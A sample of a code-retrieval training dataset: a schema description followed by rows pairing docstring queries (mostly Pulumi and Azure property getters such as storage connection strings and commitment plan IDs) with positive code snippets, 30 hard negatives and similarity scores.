Dataset schema:

  query            string  (lengths 9 to 9.05k)
  document         string  (lengths 10 to 222k)
  metadata         dict
  negatives        list    (length 30)
  negative_scores  list    (length 30)
  document_score   string  (lengths 4 to 10)
  document_rank    string  (2 classes)
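Each row pairs a natural-language query with a positive code snippet (`document`) and 30 scored hard negatives. Below is a minimal sketch of loading and inspecting one row with the Hugging Face `datasets` library; the Hub path is a hypothetical placeholder, and the field semantics are inferred from the schema above.

```python
from datasets import load_dataset  # pip install datasets

# Hypothetical Hub path -- substitute the dataset's real identifier.
ds = load_dataset("your-org/code-docstring-triplets", split="train")

row = ds[0]
print(row["query"])                 # natural-language docstring query
print(row["document"][:120])        # the positive code snippet
print(len(row["negatives"]))        # 30 hard-negative snippets
print(len(row["negative_scores"]))  # 30 scores, index-aligned with negatives
print(float(row["document_score"]), row["document_rank"])  # score is stored as a string
print(row["metadata"]["objective"]["triplet"])  # [["query", "document", "negatives"]]
```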
(Personalization Only) The storage account connection string.
def storage_account_connection_string(self) -> Optional[str]: return pulumi.get(self, "storage_account_connection_string")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rdb_storage_connection_string(self) -> str:\n return pulumi.get(self, \"rdb_storage_connection_string\")", "def account_connection_string(self) -> str:\n return pulumi.get(self, \"account_connection_string\")", "def storage_account(self) -> str:\n return pulumi.get(self, \"storage_account\")", "def storage_account_name(self) -> str:\n return pulumi.get(self, \"storage_account_name\")", "def storage_account_id(self) -> str:\n return pulumi.get(self, \"storage_account_id\")", "def get_storage_conn_string(hostname, account_name, account_key):\n\n blob_endpoint = \"%s/%s\" % (hostname, account_name)\n conn_string = \"DefaultEndpointsProtocol=http;BlobEndpoint=%s;AccountName=%s;AccountKey=%s;\" % (blob_endpoint, account_name, account_key)\n return conn_string", "def aof_storage_connection_string1(self) -> Optional[str]:\n return pulumi.get(self, \"aof_storage_connection_string1\")", "def aof_storage_connection_string0(self) -> Optional[str]:\n return pulumi.get(self, \"aof_storage_connection_string0\")", "def show_storage_account_connection_string(\n resource_group_name, account_name, protocol='https', blob_endpoint=None,\n file_endpoint=None, queue_endpoint=None, table_endpoint=None, key_name='primary'):\n from azure.cli.core._profile import CLOUD\n scf = storage_client_factory()\n obj = scf.storage_accounts.list_keys(resource_group_name, account_name) # pylint: disable=no-member\n try:\n keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member\n except AttributeError:\n # Older API versions have a slightly different structure\n keys = [obj.key1, obj.key2] # pylint: disable=no-member\n\n endpoint_suffix = CLOUD.suffixes.storage_endpoint\n connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(\n protocol,\n endpoint_suffix,\n account_name,\n keys[0] if key_name == 'primary' else keys[1]) # pylint: disable=no-member\n connection_string = '{}{}'.format(connection_string,\n ';BlobEndpoint={}'.format(blob_endpoint) if blob_endpoint else '')\n connection_string = '{}{}'.format(connection_string,\n ';FileEndpoint={}'.format(file_endpoint) if file_endpoint else '')\n connection_string = '{}{}'.format(connection_string,\n ';QueueEndpoint={}'.format(queue_endpoint) if queue_endpoint else '')\n connection_string = '{}{}'.format(connection_string,\n ';TableEndpoint={}'.format(table_endpoint) if table_endpoint else '')\n return {'connectionString': connection_string}", "def _get_autostorage_credentials_label():\n return 'autostorage_account'", "def connection_string(self) -> str:\n if self.dialect == \"sqlite\":\n ret_connection_string = f\"{self.dialect}:///{self.database}\"\n else:\n escaped_password: str = urllib.parse.quote_plus(self.password)\n auth_section: str = f\"{self.username}:{escaped_password}\"\n address: str = f\"{self.host}:{self.port}\"\n ret_connection_string = f\"{self.dialect}://{auth_section}@{address}/{self.database}\"\n\n return ret_connection_string", "def storage_account_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"storage_account_id\")", "def connection_string(self):\n return \"postgresql+psycopg2://%s:%s@%s:%s/%s\" % \\\n (os.environ['DB_USER'],\n os.environ['DB_PASSWORD'],\n os.environ['DB_HOST'],\n os.environ['DB_PORT'],\n self.database_name)", "def get_connection_string():\n connection_string = 'postgresql://' + config.GM_DB_USER + \":\" + config.GM_DB_PASSWORD + \"@\" \\\n + config.GM_DB_HOST + \":\" + config.GM_DB_PORT + \"/\" + config.GM_DB_NAME\n return connection_string", "def 
default_storage_account_id(self) -> str:\n return pulumi.get(self, \"default_storage_account_id\")", "def storage_account(self) -> Optional[pulumi.Input['EventhubSpecPropertiesCaptureDescriptionDestinationStorageAccountArgs']]:\n return pulumi.get(self, \"storage_account\")", "def get_connection_string(self):\n auth = ''\n if self.user:\n auth = self.user\n if self.password:\n auth = auth + ':' + self.password\n if auth:\n auth += '@'\n conn_string = 'postgresql://{auth}{host}/{dbname}'.format(\n auth=auth, host=self.host, dbname=self.dbname)\n\n return conn_string", "def get_connection_string(self):\n auth = ''\n if self._user:\n auth = self._user\n if self._password:\n auth = auth + ':' + self._password\n if auth:\n auth += '@'\n conn_string = 'postgresql://{auth}{host}/{dbname}'.format(\n auth=auth, host=self._hostname, dbname=self._dbname)\n\n return conn_string", "def storage_account_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"storage_account_id\")", "def storage_account_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"storage_account_id\")", "def storage_account_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"storage_account_id\")", "def connection_string(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"connection_string\")", "def connection_string(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"connection_string\")", "def storage_account_tenant_id(self) -> Optional[str]:\n return pulumi.get(self, \"storage_account_tenant_id\")", "def establish_connection() -> storage.client.Client:\n storage_client = storage.Client.from_service_account_json(find('Agriculture.json', '/home'))\n return storage_client", "def get_azure_storage_account_name(self):\n try:\n account = self.instance_metadata.get_tags()['bkp_storage_account']\n logging.debug(\"Using storage account name from instance metadata: %s\", account)\n except Exception:\n cid = self.get_customer_id().lower()\n name = self.get_vm_name()[0:5]\n account = \"sa{}{}backup0001\".format(name, cid)\n logging.debug(\"No storage account in instance metadata, using generated: %s\", account)\n return account", "def connection_string(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"connection_string\")", "def get_db_connect_string(self):\n template_string = \"host={} dbname={} user={} password={}\"\n return template_string.format(self.get(\"DB_HOST\"),\n self.get(\"DB_NAME\"),\n self.get(\"DB_USER\"),\n self.get(\"DB_PASSWORD\"))", "def storage_account_subscription_id(self) -> Optional[str]:\n return pulumi.get(self, \"storage_account_subscription_id\")", "def artifacts_storage_account_id(self) -> str:\n return pulumi.get(self, \"artifacts_storage_account_id\")" ]
[ "0.78525084", "0.77868885", "0.7490864", "0.7084924", "0.68205947", "0.680374", "0.6798149", "0.65964776", "0.6592029", "0.65299773", "0.63563156", "0.6331491", "0.63102967", "0.6303591", "0.62777317", "0.6277717", "0.6274107", "0.6228608", "0.6228479", "0.6141211", "0.6141211", "0.61337936", "0.61337936", "0.6106763", "0.60186505", "0.59950376", "0.59929955", "0.59721255", "0.5929622", "0.5918848" ]
0.8600586
0
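The `metadata` field of each row declares a (query, document, negatives) triplet objective. As a minimal sketch of one common way such triplets are consumed, here is an InfoNCE-style contrastive loss over the positive and its 30 negatives; the encoder is left abstract (random vectors below), since the dataset does not prescribe a model.

```python
import torch
import torch.nn.functional as F

def info_nce_loss(q_emb, pos_emb, neg_embs, temperature=0.05):
    """InfoNCE over one positive and N hard negatives.

    q_emb:    (d,) query embedding
    pos_emb:  (d,) embedding of the positive document
    neg_embs: (N, d) embeddings of the negatives
    """
    q = F.normalize(q_emb, dim=-1)
    cands = F.normalize(torch.cat([pos_emb.unsqueeze(0), neg_embs]), dim=-1)
    logits = cands @ q / temperature       # (N+1,) scaled cosine similarities
    target = torch.tensor([0])             # the positive sits at index 0
    return F.cross_entropy(logits.unsqueeze(0), target)

# Toy usage: random vectors stand in for real encoder outputs.
loss = info_nce_loss(torch.randn(768), torch.randn(768), torch.randn(30, 768))
print(float(loss))
```

Keeping the positive at index 0 makes the cross-entropy target constant; the collate sketch further down follows the same convention.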
(Metrics Advisor Only) The super user of Metrics Advisor.
def super_user(self) -> Optional[str]: return pulumi.get(self, "super_user")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def user(self):\n pass", "def user(self):\n return self.getattr('user')", "def user(self):\n return self._forced_user", "def get_user(self):\n return None", "def user(self):\n return self._user", "def user(self):\n return self._user", "def user(self):\n return self._user", "def user(self):\n return self._user", "def get_current_user(self):\n return None", "def user(self):\n return self.owner.user", "def get_user(self):\n raise NotImplementedError", "def get_user(self):\n return self.get('users/self')", "def get_user(self):\n return self.user", "def get_user(self):\n return self.user", "def user(self) -> str:\n return self._user", "def get_current_user(self):\r\n return self.jira.current_user()", "def get_current_user(self):\n return self.current_user", "def _get_current_user(self):\r\n real_user = self.runtime.get_real_user(self.runtime.anonymous_student_id)\r\n return real_user", "def user(self):\n u = self.user_info\n return self.user_model.get_by_id(u['user_id']) if u else None", "def user(self):\n return self.contact.user", "def me():\n return current_user.get()", "def author(self):\r\n return self.user", "def target_user(self):\n return self.request.user", "def user(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"user\")", "def _current_login_user(self):\n return self.env.uid", "def get_default(cls):\n return cls.USER", "def isSuper(self):\n user = self.getSession()\n return self.pipe.auth.isSuper(user)", "def user(self):", "def nscaweb_user(self):\n return self.__get_option('nscaweb_user')", "def current_user_info():\n\n return current_user" ]
[ "0.6955923", "0.66741955", "0.66067237", "0.6595119", "0.6546568", "0.6546568", "0.6546568", "0.6546568", "0.65376055", "0.64804995", "0.6439071", "0.6429419", "0.63909256", "0.63909256", "0.6382017", "0.6368345", "0.63560563", "0.6195999", "0.6175691", "0.6140341", "0.61271036", "0.61076653", "0.61040825", "0.6099704", "0.60976213", "0.6089839", "0.6072301", "0.60701686", "0.6046301", "0.60394776" ]
0.7323845
0
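The `negative_scores` and `document_score` fields look like bi-encoder similarities between the query and each candidate. A sketch of how such scores could be reproduced with an off-the-shelf model follows; `all-MiniLM-L6-v2` is an assumed stand-in, not necessarily the encoder that produced the numbers stored here.

```python
from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer("all-MiniLM-L6-v2")  # assumed stand-in encoder

query = "(Metrics Advisor Only) The super user of Metrics Advisor."
candidates = [
    # the positive document from the row above
    'def super_user(self) -> Optional[str]:\n    return pulumi.get(self, "super_user")',
    # its top hard negative (stored score: 0.6955923)
    "def user(self):\n    pass",
]

q_emb = model.encode(query, convert_to_tensor=True)
c_embs = model.encode(candidates, convert_to_tensor=True)
scores = util.cos_sim(q_emb, c_embs)[0]  # cosine similarity per candidate
for text, score in zip(candidates, scores):
    print(f"{score.item():.4f}  {text.splitlines()[0]}")
```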
(Metrics Advisor Only) The website name of Metrics Advisor.
def website_name(self) -> Optional[str]: return pulumi.get(self, "website_name")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getSiteName():\n return os.environ['SITENAME']", "def site_name(self, obj):\n site = obj.site\n return (\"%s\" % (site.name))", "def sitename(self) :\n\t\ttry :\n\t\t\treturn self._sitename\n\t\texcept Exception as e:\n\t\t\traise e", "def bucket_website_domain_name(self) -> str:\n ...", "def Site(self) -> str:", "def get_website(self, name):\n return self.store.website.id", "def bucket_website_domain_name(self) -> str:\n return jsii.get(self, \"bucketWebsiteDomainName\")", "def bucket_website_domain_name(self) -> str:\n return jsii.get(self, \"bucketWebsiteDomainName\")", "def admin_site_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"admin_site_name\")", "def server_site_name(self):\n return dsdb._samdb_server_site_name(self)", "def domain_name(self) -> str:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> str:\n return pulumi.get(self, \"domain_name\")", "def site_name(self):\n # TODO: add a check lookup dictionary for other telescopes\n # to ensure astropy compatibility\n return self.meta[\"header\"][\"TELESCOP\"]", "def website(self):\n return self._website", "def site(obj):\n return \"%s\" % (obj.site.name)", "def get_domain_name(self):\n return self.domain_name.get_text()", "def Hostname(self):\n return self._get_attribute('hostname')", "def domain(cls) -> str:\n return f'{cls.name}.wikimedia.org'", "def get_sitemodulename(self):\n return self.sitemodulename", "def get_id(self):\n return self.get_sitename()", "def metric_name(self) -> str:\n return pulumi.get(self, \"metric_name\")", "def metric_name(self) -> str:\n return pulumi.get(self, \"metric_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def botname(self):\n return settings.AIM_USERNAME", "def website_url(self):\n return self._website_url", "def site_name(request):\n return {'site_name':'CatFood'}", "def marketing_name(self):\n return \"Custom solution - 2\"", "def _get_object_name(self) :\n\t\ttry :\n\t\t\tif self.sitename is not None :\n\t\t\t\treturn str(self.sitename)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e" ]
[ "0.69923437", "0.69106567", "0.6616829", "0.6565683", "0.6469414", "0.6435438", "0.6411144", "0.6411144", "0.6380905", "0.6277378", "0.62384963", "0.62384963", "0.617236", "0.61205363", "0.60646456", "0.605211", "0.59489995", "0.5926967", "0.5890607", "0.588797", "0.5839904", "0.5839904", "0.58319676", "0.58319676", "0.58319676", "0.58218443", "0.5807864", "0.58055604", "0.5792449", "0.57910305" ]
0.7566009
0
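Rows that carry both a positive score and per-negative scores also support score distillation. Here is a minimal MarginMSE sketch under that assumption: the student trains its positive-minus-negative margin toward the teacher's, with the teacher numbers taken verbatim from the first record in this dump.

```python
import torch
import torch.nn.functional as F

def margin_mse_loss(student_pos, student_neg, teacher_pos, teacher_neg):
    """Match the student's positive-minus-negative margin to the teacher's."""
    return F.mse_loss(student_pos - student_neg, teacher_pos - teacher_neg)

# Teacher margin from the first record above: document_score 0.8600586
# versus its top negative_score 0.78525084.
teacher_pos = torch.tensor([0.8600586])
teacher_neg = torch.tensor([0.78525084])
student_pos = torch.tensor([0.71], requires_grad=True)  # toy student scores
student_neg = torch.tensor([0.69], requires_grad=True)
loss = margin_mse_loss(student_pos, student_neg, teacher_pos, teacher_neg)
loss.backward()
print(float(loss))
```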
The renewal period in seconds of Call Rate Limit.
def renewal_period(self) -> Optional[float]: return pulumi.get(self, "renewal_period")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def expirePeriodInSeconds(self)->int:\n return self._lic.params['periodInSeconds'].value", "def refresh_period(self):\n return int(self.__get_option('refresh_period'))", "def update_period(self):\n return 0.1", "def refresh_period_in_seconds(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"refresh_period_in_seconds\")", "def token_expires_in(self):\n return 60 * 60", "def cooldown_grace_period_minutes(self):\n return self._cooldown_grace_period_minutes", "def get_period(self):\n # res\n if self._cacheExpiration <= YAPI.GetTickCount():\n if self.load(YAPI._yapiContext.GetCacheValidity()) != YAPI.SUCCESS:\n return YPwmOutput.PERIOD_INVALID\n res = self._period\n return res", "def get_period_guarantee_advance(self):\n return ceiling(self.scheduled_completion, 3)", "def max_age(self):\n return 120 if self.realtime else 1800", "def update_rate_limit(self, request: Request):\n if request.response is None:\n return\n headers = request.response.headers\n\n self.rate_limit_remaining = int(headers[\"x-ratelimit-remaining\"])\n\n self.rate_limit_sleep = int(headers.get(\"Retry-After\", 0))\n if self.rate_limit_sleep:\n self.rate_limit_sleep += 1 # 1 extra second sleep", "def current_effective_deadline(cls) -> float:", "def duration(self):\n if self.is_valid:\n return relativedelta(self.expiry, datetime.date.today()).years\n else:\n return -1", "def call_rate_limit(self) -> 'outputs.CallRateLimitResponse':\n return pulumi.get(self, \"call_rate_limit\")", "def call_rate_limit(self) -> 'outputs.CallRateLimitResponse':\n return pulumi.get(self, \"call_rate_limit\")", "def call_rate_limit(self) -> 'outputs.CallRateLimitResponse':\n return pulumi.get(self, \"call_rate_limit\")", "def expires_in(self):\n # TODO: Use Arrow?\n expiration = datetime.datetime.fromtimestamp(self.expiration)\n now = datetime.datetime.now()\n\n return expiration - now", "def billing_period_duration(self):\n return self._safe_value(VAR_BILLINGPERIODDURATION, int)", "def refresh_interval(self):\n return self._refresh_interval", "def _get_delay(self):\n delay = int(60 / self.REQUESTS_PER_MINUTE * len(accounts.get_all()))\n return delay", "def _get_delay(self):\n delay = int(60 / self.REQUESTS_PER_MINUTE * len(accounts.get_all()))\n return delay", "def circulation_default_extension_duration(loan):\n return timedelta(days=30)", "def rate_limit_remaining(self):\n if os.path.isfile(self.rate_limit_filename):\n st = os.stat(self.rate_limit_filename)\n if time.time() - st.st_ctime > self.RATE_LIMIT_DURATION:\n return self.RATE_LIMIT_COUNT\n else:\n with open(self.rate_limit_filename, 'r') as f:\n failed_login_attempts = int(f.read())\n return max(0, self.RATE_LIMIT_COUNT - failed_login_attempts)\n else:\n return self.RATE_LIMIT_COUNT", "def reset_rate_limit(self):\n self.rate_limit_remaining += 1\n self.rate_limit_remaining = min(\n self.rate_limit_remaining, self.rate_limit_limit)\n\n # Countdown of retry sleep seconds\n if self.rate_limit_sleep:\n self.rate_limit_sleep -= 1", "def rate_limiter(rl_params):\n # Please respect the parties providing these free api's to us and do not modify this code.\n # If I suspect any abuse I will revoke all api keys and require all users\n # to have a personal api key for all services.\n # Thank you\n if not rl_params:\n return\n monitor = xbmc.Monitor()\n win = xbmcgui.Window(10000)\n rl_name = rl_params[0]\n rl_delay = rl_params[1]\n cur_timestamp = int(time.mktime(datetime.datetime.now().timetuple()))\n prev_timestamp = try_parse_int(win.getProperty(\"ratelimiter.%s\" % rl_name))\n 
if (prev_timestamp + rl_delay) > cur_timestamp:\n sec_to_wait = (prev_timestamp + rl_delay) - cur_timestamp\n log_msg(\n \"Rate limiter active for %s - delaying request with %s seconds - \"\n \"Configure a personal API key in the settings to get rid of this message and the delay.\" %\n (rl_name, sec_to_wait), xbmc.LOGNOTICE)\n while sec_to_wait and not monitor.abortRequested():\n monitor.waitForAbort(1)\n # keep setting the timestamp to create some sort of queue\n cur_timestamp = int(time.mktime(datetime.datetime.now().timetuple()))\n win.setProperty(\"ratelimiter.%s\" % rl_name, \"%s\" % cur_timestamp)\n sec_to_wait -= 1\n # always set the timestamp\n cur_timestamp = int(time.mktime(datetime.datetime.now().timetuple()))\n win.setProperty(\"ratelimiter.%s\" % rl_name, \"%s\" % cur_timestamp)\n del monitor\n del win", "def get_retention_time(self):\n return self.now - datetime.timedelta(days=int(RETENTION_DAYS)) + datetime.timedelta(seconds=int(10))", "def LSPRefreshRate(self):\r\n\t\treturn self._get_attribute('lSPRefreshRate')", "def time_remaining(self):\n with self._lock:\n deadline = self._expiration_manager.deadline()\n return max(0.0, deadline - time.time())", "def retry_interval_in_minutes(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"retry_interval_in_minutes\")", "def retry_interval_in_minutes(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"retry_interval_in_minutes\")", "def get_limit_per_second(self):\n pass" ]
[ "0.7220695", "0.68607104", "0.66482574", "0.6505736", "0.64645785", "0.6337664", "0.62624717", "0.62323433", "0.6031927", "0.6022835", "0.6014422", "0.60099036", "0.60031545", "0.60031545", "0.60031545", "0.5978044", "0.59692264", "0.59621155", "0.5960568", "0.5960568", "0.593474", "0.5931", "0.5921017", "0.59167606", "0.5915931", "0.58997244", "0.58832794", "0.58714163", "0.58714163", "0.5861979" ]
0.73784405
0
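For batched training, rows with this schema flatten naturally into parallel query/candidate lists. A small collate sketch, assuming the same index-0-positive convention as the InfoNCE example above:

```python
def collate(rows, n_neg=4):
    """Flatten rows with this schema into parallel query/candidate lists.

    The positive document is kept at index 0 of each candidate list,
    matching the convention used in the InfoNCE sketch above.
    """
    queries, candidates = [], []
    for row in rows:
        queries.append(row["query"])
        candidates.append([row["document"]] + list(row["negatives"])[:n_neg])
    return queries, candidates

# Toy usage with a literal row shaped like the records in this dump.
demo = [{"query": "The renewal period in seconds of Call Rate Limit.",
         "document": "def renewal_period(self): ...",
         "negatives": ["def refresh_period(self): ...",
                       "def update_period(self): ..."]}]
queries, candidates = collate(demo)
print(queries[0], len(candidates[0]))  # query text, 1 positive + 2 negatives
```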
Cognitive Services account commitment quota.
def quota(self) -> 'outputs.CommitmentQuotaResponse': return pulumi.get(self, "quota")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def online_quota(self):\r\n return self.max_contributions - self.num_tickets_total", "def account_space(access_token):\n client = dropbox.client.DropboxClient(access_token)\n account_info = client.account_info()\n quota_info = account_info['quota_info']\n total = quota_info['quota']\n used = quota_info['normal'] + quota_info['shared']\n return total - used", "def quota(self) -> int:\n return pulumi.get(self, \"quota\")", "def get_quota(self):\n raise NotImplementedError", "def quota():\n try:\n fname = os.path.join(os.path.expanduser(\"~\"), \".planet.json\")\n contents = {}\n if os.path.exists(fname):\n with open(fname, \"r\") as fp:\n contents = json.loads(fp.read())\n else:\n raise IOError(\"Escape to End and Initialize\")\n if not len(contents) != 0:\n raise IOError(\"Escape to End and Initialize\")\n else:\n k = contents[\"key\"]\n main = requests.get(\n \"https://api.planet.com/auth/v1/\" + \"experimental/public/my/subscriptions\",\n auth=HTTPBasicAuth(k, \"\"),\n )\n if main.status_code == 200:\n content = main.json()\n for item_id in content:\n print(\" \")\n print(\"Allocation Name: %s\" % item_id[\"organization\"][\"name\"])\n print(\n \"Allocation active from: %s\" % item_id[\"active_from\"].split(\"T\")[0]\n )\n print(\"Quota Enabled: %s\" % item_id[\"quota_enabled\"])\n print(\"Total Quota in SqKm: %s\" % item_id[\"quota_sqkm\"])\n print(\"Total Quota used: %s\" % item_id[\"quota_used\"])\n if (item_id[\"quota_sqkm\"]) is not None:\n leftquota = float(\n item_id[\"quota_sqkm\"] - float(item_id[\"quota_used\"])\n )\n print(\"Remaining Quota in SqKm: %s\" % leftquota)\n else:\n print(\"No Quota Allocated\")\n print(\"\")\n else:\n print(\"Failed with exception code: \" + str(main.status_code))\n\n except IOError:\n print(\"Initialize client or provide API Key\")", "def AllocateQuota(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _get_next_limit(self):\n return self.__quota", "def getAccountSize(self, authenticationToken):\r\n pass", "def current_capacity_range(self):\n done, data = self._request('GC')\n if done:\n return int(data[0]), int(data[1])\n\n raise EvseError", "def get_additional_ball_capacity(self):\n return 999", "def get_additional_ball_capacity(cls):\n return 999", "def test_list_cluster_resource_quota(self):\n pass", "def get_send_quota(self):\r\n return self._make_request('GetSendQuota')", "def test_create_cluster_resource_quota(self):\n pass", "def charge_limit(self, limit=None):\n if limit is None:\n done, data = self._request('GH')\n if done:\n return int(data[0])\n else:\n if self._request('SH', str(int(limit)))[0]:\n return limit\n\n raise EvseError", "def set_bucket_quota(self, uid, max_objects, cluster_name=\"ceph\"):\n cmd = (\n \"radosgw-admin quota set --uid=%s --quota-scope=bucket --max-objects=%s --cluster %s\"\n % (uid, max_objects, cluster_name)\n )\n status = utils.exec_shell_cmd(cmd)\n if not status[0]:\n raise AssertionError(status[1])\n log.info(\"quota set complete\")", "def api_quota():\n # Create the required data dictionary for Quota/Status\n api_data = {} # type: Dict[str, str]\n response = http_request(endpoint=API_QUOTA, data=api_data)\n\n if response.get('errorNo') != 0:\n return_error('API Returned, {}:{}'.format(response.get('errorNo'), response.get('errorMsg')))\n\n return response", "def usage_quota(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"usage_quota\")", "def 
_calculate_simple_quota(context, resource, requested):\n quota = get_project_quotas(context, context.project_id)\n allowed = _get_request_allotment(requested, 0, quota[resource])\n return min(requested, allowed)", "def capacity_gb(self) -> str:\n return pulumi.get(self, \"capacity_gb\")", "def get_request_limit(self, access_token):\n url = \"{0}/rate_limit?access_token={1}\"\n response = requests.get(url.format(self.ROOT_API_URL, access_token))\n data = response.json()\n return data['resources']['core'].get(\"remaining\")", "def create_capacity_limiter(total_tokens: float) -> abc.CapacityLimiter:\n return get_asynclib().CapacityLimiter(total_tokens)", "def budget_used(self):\n return int(self.total_spent() / self.budget() * 100.0)", "def get_quota(self):\n path = 'urlCategories/urlQuota'\n return self._session.get(path)", "def test_replace_cluster_resource_quota(self):\n pass", "def available_capacity(self):\r\n return self.capacity - len(self.passengers)", "def update(self, accountId, name, maxMemoryCapacity, maxVDiskCapacity, maxCPUCapacity, maxNetworkPeerTransfer, maxNumPublicIP, sendAccessEmails=True, **kwargs):\n #put your code here to implement this method\n raise NotImplementedError (\"not implemented method update\")", "def api_quota_command():\n # 1. There is no parameter input required from Demisto\n # 2. Get the quota status info from SlashNext API\n response = api_quota()\n if response.get('errorNo') != 0:\n return\n # 3. Parse and format the response\n quota_data = response.get('quotaDetails')\n\n title = 'SlashNext Phishing Incident Response - API Quota\\n'\\\n '##### Note: {}'.format(quota_data.get('note'))\n\n snx_ioc_cont = {\n 'LicensedQuota': quota_data.get('licensedQuota'),\n 'RemainingQuota': quota_data.get('remainingQuota'),\n 'ExpirationDate': quota_data.get('expiryDate'),\n 'IsExpired': quota_data.get('isExpired')\n }\n\n ec = {\n 'SlashNext.Quota(val.Value === obj.Value)': snx_ioc_cont\n }\n\n md = tableToMarkdown(\n title,\n snx_ioc_cont,\n ['LicensedQuota',\n 'RemainingQuota',\n 'ExpirationDate']\n )\n\n return_outputs(md, ec, snx_ioc_cont)", "def deposits_limit(self):\n limits = self.user.limits\n value = 0\n if limits.exists():\n value = self.user.limits.get(type=Limit.DEPOSIT).value\n return value", "def Capacity(self) -> int:" ]
[ "0.6712958", "0.65523666", "0.6515917", "0.631611", "0.60914433", "0.6000025", "0.57346606", "0.5602452", "0.5518095", "0.551689", "0.54627246", "0.545674", "0.5402079", "0.53996605", "0.53487813", "0.5334519", "0.53081733", "0.5271333", "0.5261874", "0.519679", "0.5194432", "0.5173346", "0.5169073", "0.5160202", "0.51546013", "0.51447475", "0.51438284", "0.5143025", "0.51425904", "0.5134722" ]
0.76280224
0
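`document_rank` is plausibly the zero-based rank of the positive once all 31 candidates are sorted by score; that definition is consistent with the rank-0 rows shown here, though the schema's two classes imply some rows rank differently. A one-liner sketch under that assumption:

```python
def positive_rank(document_score: float, negative_scores: list) -> int:
    """Zero-based rank of the positive among all scored candidates."""
    return sum(score > document_score for score in negative_scores)

# Row above: document_score 0.76280224 against its leading negative_scores.
print(positive_rank(0.76280224, [0.6712958, 0.65523666, 0.6515917]))  # -> 0
```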
The Azure resource id of the commitment plan.
def commitment_plan_id(self) -> Optional[str]: return pulumi.get(self, "commitment_plan_id")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def plan_id(self) -> str:\n return self._plan_id", "def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_id\")", "def resource_pool_id(self) -> str:\n return pulumi.get(self, \"resource_pool_id\")", "def resourceid(self):", "def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")", "def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")" ]
[ "0.7716365", "0.6851893", "0.6851893", "0.6851893", "0.6644602", "0.6575877", "0.6432363", "0.643091", "0.643091", "0.6401933", "0.6401933", "0.6401933", "0.6401933", "0.6401933", "0.6317398", "0.6317398", "0.6317398", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6249792", "0.6249792", "0.6249792", "0.6249792" ]
0.7871174
0
